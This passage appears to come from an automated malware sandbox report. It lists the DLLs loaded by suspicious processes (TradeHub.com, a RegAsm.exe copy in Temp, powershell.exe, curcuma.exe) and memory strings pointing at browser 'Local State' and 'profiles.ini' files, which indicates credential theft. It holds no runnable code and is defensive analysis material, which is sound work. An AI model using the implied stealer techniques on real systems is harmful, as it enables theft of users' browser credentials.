                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptnet.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cabinet.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: devenum.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: devobj.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msdmo.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: avicap32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msvfw32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mmdevapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: ADFoyxP.exe Static file information: File size 3665550 > 1048576
                  Source: ADFoyxP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2: source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1 source: curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000024.00000003.2136454480.000002428F022000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: rnlmp.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191568059.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192182151.000002428F010000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2wek source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: r\AppData\Local\Temp\Symbols\ntkrnlmp.pdbR7 source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inic source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB90 source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ]\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2457464322.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1n source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2I" source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428EFDE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58315"G source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58313 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<,[ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, 